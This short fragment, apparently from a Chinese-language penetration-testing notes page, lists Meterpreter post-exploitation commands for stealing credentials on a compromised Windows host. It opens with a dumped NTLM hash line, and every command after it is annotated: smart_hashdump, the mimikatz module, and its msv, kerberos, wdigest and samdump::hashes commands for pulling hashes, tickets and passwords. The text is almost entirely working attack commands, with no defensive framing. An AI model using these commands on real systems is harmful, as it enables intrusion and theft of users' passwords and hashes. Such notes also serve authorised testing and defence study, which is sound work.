root:1000:aad3b435b51404eeaad3b435b51404ee:d503a8571a79baf9b951884f350ad048:::
meterpreter > run windows/gather/smart_hashdump \使用smart_hashdump导出所有用户的hash到文件
meterpreter > load mimikatz \使用mimikatz抓取密码
meterpreter > msv \抓取系统hash值
meterpreter > Kerberos \抓取系统票据
meterpreter > wdigest \抓取系统账户信息
meterpreter > mimikatz_command -f samdump::hashes \抓取hash,mimikatz_command可以让我们使用Mimikatz全部功能。这里不知道为啥没用抓取成功,可能是win10不支持?
meterpreter > mimikatz_command -f handle::list \查看进程